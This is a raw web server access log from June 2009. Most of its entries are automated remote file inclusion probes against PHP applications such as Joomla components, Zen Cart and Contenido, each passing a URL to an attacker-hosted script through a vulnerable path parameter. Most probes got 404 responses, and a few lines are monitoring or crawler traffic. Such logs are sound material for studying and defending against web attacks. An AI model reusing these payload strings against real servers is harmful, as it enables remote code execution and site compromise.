211.234.107.233 - - [20/Jun/2009:01:37:01 -0400] "GET /logs/error_log.Q109052800//include/footer.php?_path[counter]=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
65.98.59.178 - - [20/Jun/2009:01:37:12 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://yongsin.es.kr/sk.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
65.98.59.178 - - [20/Jun/2009:01:37:12 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://yongsin.es.kr/sk.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
65.98.59.178 - - [20/Jun/2009:01:37:12 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://yongsin.es.kr/sk.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
65.98.59.178 - - [20/Jun/2009:01:37:13 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://yongsin.es.kr/sk.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
65.98.59.178 - - [20/Jun/2009:01:37:31 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://yongsin.es.kr/sk.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
124.217.216.86 - - [20/Jun/2009:01:38:39 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.217.216.86 - - [20/Jun/2009:01:38:39 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.217.216.86 - - [20/Jun/2009:01:38:39 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 213 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.217.216.86 - - [20/Jun/2009:01:38:39 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.217.216.86 - - [20/Jun/2009:01:38:48 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.108.67.172 - - [20/Jun/2009:01:39:02 -0400] "GET /logs/error_log.Q109030200///ee_commerce/paypalcart.php?toroot=http://www.salaopontochic.com.br/r0x.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.812"
89.108.67.172 - - [20/Jun/2009:01:39:02 -0400] "GET ///ee_commerce/paypalcart.php?toroot=http://www.salaopontochic.com.br/r0x.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.812"
89.108.67.172 - - [20/Jun/2009:01:39:03 -0400] "GET /logs///ee_commerce/paypalcart.php?toroot=http://www.salaopontochic.com.br/r0x.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.812"
69.94.80.27 - - [20/Jun/2009:01:39:03 -0400] "GET //atom.php5?page=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:39:03 -0400] "GET /logs//atom.php5?page=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:39:08 -0400] "GET /logs/access_log.Q109052300//atom.php5?page=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:01:39:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.144.44.36 - - [20/Jun/2009:01:39:35 -0400] "GET /logs/access_log.Q109051100//modules/My_eGallery/public/displayCategory.php?basepath=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
190.144.44.36 - - [20/Jun/2009:01:39:39 -0400] "GET /logs/access_log.Q109060300//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
200.101.192.223 - - [20/Jun/2009:01:39:48 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.macwireless.com/help01.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.76"
200.101.192.223 - - [20/Jun/2009:01:39:48 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.macwireless.com/help01.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.76"
200.101.192.223 - - [20/Jun/2009:01:39:48 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.macwireless.com/help01.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.76"
200.101.192.223 - - [20/Jun/2009:01:39:48 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.macwireless.com/help01.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.76"
190.144.44.36 - - [20/Jun/2009:01:40:13 -0400] "GET /logs/access_log.Q109052100//modules/My_eGallery/public/displayCategory.php?basepath=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
211.234.107.233 - - [20/Jun/2009:01:40:15 -0400] "GET /logs//include/footer.php?_path[counter]=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
211.234.107.233 - - [20/Jun/2009:01:40:16 -0400] "GET /logs/access_log.Q109052800//include/footer.php?_path[counter]=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
211.234.107.233 - - [20/Jun/2009:01:40:16 -0400] "GET //include/footer.php?_path[counter]=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:40:19 -0400] "GET /logs/access_log.Q109052300%20%20//atom.php5?page=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:01:40:30 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:01:40:30 -0400] "GET /logs/access_log.Q109060800/?_SERVER[DOCUMENT_ROOT]=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:01:40:30 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 200 6242 "-" "Mozilla/5.0"
211.234.107.233 - - [20/Jun/2009:01:40:35 -0400] "GET /logs/error_log.Q109052800//include/footer.php?_path[counter]=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
222.122.45.16 - - [20/Jun/2009:01:41:17 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
222.122.45.16 - - [20/Jun/2009:01:41:18 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
222.122.45.16 - - [20/Jun/2009:01:41:18 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
83.98.209.71 - - [20/Jun/2009:01:41:30 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:01:41:30 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:01:41:30 -0400] "GET /logs/access_log.Q109061100//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:01:41:39 -0400] "GET /logs/access_log.Q109060800%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:01:41:40 -0400] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:01:41:40 -0400] "GET /logs/access_log.Q109060300//components/com_performs/performs.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:01:41:40 -0400] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:01:41:41 -0400] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:01:41:41 -0400] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:01:41:41 -0400] "GET /logs/access_log.Q109060300//components/com_performs/performs.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:01:41:52 -0400] "GET /logs/access_log.Q109050900//components/com_performs/performs.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:01:41:53 -0400] "GET /logs/access_log.Q109050900//components/com_performs/performs.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:01:42:07 -0400] "GET /logs/access_log.Q109051200//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:01:42:20 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:01:42:20 -0400] "GET /logs/access_log.Q109060800/?_SERVER[DOCUMENT_ROOT]=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:01:42:20 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 200 6242 "-" "Mozilla/5.0"
211.234.107.233 - - [20/Jun/2009:01:42:20 -0400] "GET /logs/access_log.Q109052800//include/footer.php?_path[counter]=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
211.234.107.233 - - [20/Jun/2009:01:42:20 -0400] "GET /logs//include/footer.php?_path[counter]=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
211.234.107.233 - - [20/Jun/2009:01:42:20 -0400] "GET //include/footer.php?_path[counter]=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:01:42:36 -0400] "GET /logs/access_log.Q109051600//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:01:42:38 -0400] "GET /?_zb_path=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:01:42:38 -0400] "GET /logs/?_zb_path=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 200 6242 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:01:42:38 -0400] "GET /logs/access_log.Q109051300/?_zb_path=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.234.107.233 - - [20/Jun/2009:01:42:54 -0400] "GET /logs/error_log.Q109052800//include/footer.php?_path[counter]=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.246.20.221 - - [20/Jun/2009:01:43:04 -0400] "GET /logs/error_log.Q109051400%20%20//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:01:43:14 -0400] "GET /logs/access_log.Q109051800/?_zb_path=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:01:43:25 -0400] "GET /logs/access_log.Q109060900%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
190.144.44.36 - - [20/Jun/2009:01:43:33 -0400] "GET //include/write.php?dir=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
190.144.44.36 - - [20/Jun/2009:01:43:33 -0400] "GET /logs//include/write.php?dir=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
190.144.44.36 - - [20/Jun/2009:01:43:33 -0400] "GET /logs/access_log.Q109051100//include/write.php?dir=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:01:43:37 -0400] "GET /?_zb_path=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:01:43:37 -0400] "GET /logs/?_zb_path=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 200 6242 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:01:43:37 -0400] "GET /logs/access_log.Q109051300/?_zb_path=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
222.122.45.16 - - [20/Jun/2009:01:43:45 -0400] "GET /logs/error_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
83.222.193.94 - - [20/Jun/2009:01:44:03 -0400] "GET /logs/access_log.Q109051800/?_zb_path=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
190.144.44.36 - - [20/Jun/2009:01:44:04 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [20/Jun/2009:01:44:04 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:01:44:11 -0400] "GET /logs/access_log.Q109060800%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:01:44:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.144.44.36 - - [20/Jun/2009:01:44:44 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
190.144.44.36 - - [20/Jun/2009:01:44:44 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.249.71.54 - - [20/Jun/2009:01:45:30 -0400] "GET /images/download_check_back.jpg HTTP/1.1" 200 4446 "-" "Googlebot-Image/1.0"
83.222.193.94 - - [20/Jun/2009:01:46:23 -0400] "GET /logs/access_log.Q109051300%20%20/?_zb_path=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:01:46:28 -0400] "GET /logs/access_log.Q109021400 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.222.193.94 - - [20/Jun/2009:01:46:33 -0400] "GET /logs/access_log.Q109051800%20%20/?_zb_path=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:01:46:51 -0400] "GET /logs/access_log.Q109060900%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.15.254.22 - - [20/Jun/2009:01:47:01 -0400] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
121.15.254.22 - - [20/Jun/2009:01:47:01 -0400] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
121.15.254.22 - - [20/Jun/2009:01:47:01 -0400] "GET /logs/access_log.Q109052100/index.php?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.15.254.22 - - [20/Jun/2009:01:47:02 -0400] "GET /logs/access_log.Q109052100/index.php?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.15.254.22 - - [20/Jun/2009:01:47:02 -0400] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
121.15.254.22 - - [20/Jun/2009:01:47:02 -0400] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:01:47:18 -0400] "GET //components/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:01:47:18 -0400] "GET /logs//components/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:01:47:18 -0400] "GET /logs/access_log.Q109052400//components/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:01:47:35 -0400] "GET /logs/access_log.Q109051300%20%20/?_zb_path=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:01:47:50 -0400] "GET /logs/access_log.Q109051800%20%20/?_zb_path=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:01:48:21 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:01:48:21 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:01:48:21 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.122.160.145 - - [20/Jun/2009:01:48:37 -0400] "GET /logs/access_log.Q109061100/convert/mvcw.php?vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
222.122.160.145 - - [20/Jun/2009:01:48:46 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
83.98.209.71 - - [20/Jun/2009:01:49:25 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:01:49:25 -0400] "GET /logs/access_log.Q109061100//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:01:49:25 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:01:49:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.98.209.71 - - [20/Jun/2009:01:49:51 -0400] "GET /logs/access_log.Q109051200//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:01:50:16 -0400] "GET /logs/access_log.Q109051600//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:50:19 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:50:19 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:50:20 -0400] "GET /logs/access_log.Q109052400//components/com_simpleboard/image_upload.php?sbp=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jun/2009:01:50:23 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
123.143.98.5 - - [20/Jun/2009:01:50:23 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
123.143.98.5 - - [20/Jun/2009:01:50:23 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
123.143.98.5 - - [20/Jun/2009:01:50:25 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
123.143.98.5 - - [20/Jun/2009:01:50:25 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
123.143.98.5 - - [20/Jun/2009:01:50:25 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
69.94.80.27 - - [20/Jun/2009:01:50:54 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:50:54 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:50:54 -0400] "GET /logs/access_log.Q109052400//components/com_simpleboard/image_upload.php?sbp=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
61.100.183.125 - - [20/Jun/2009:01:51:11 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.angelcitytrading.com/css/test.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
61.100.183.125 - - [20/Jun/2009:01:51:11 -0400] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.angelcitytrading.com/css/test.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
190.144.44.36 - - [20/Jun/2009:01:51:13 -0400] "GET /logs/access_log.Q109051100%20%20//include/write.php?dir=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jun/2009:01:51:36 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
123.143.98.5 - - [20/Jun/2009:01:51:42 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
220.231.126.252 - - [20/Jun/2009:01:52:11 -0400] "GET /logs/error_log.Q108061100//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.808"
220.231.126.252 - - [20/Jun/2009:01:52:11 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.808"
220.231.126.252 - - [20/Jun/2009:01:52:11 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.808"
220.231.126.252 - - [20/Jun/2009:01:52:13 -0400] "GET /logs/error_log.Q108061100//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.808"
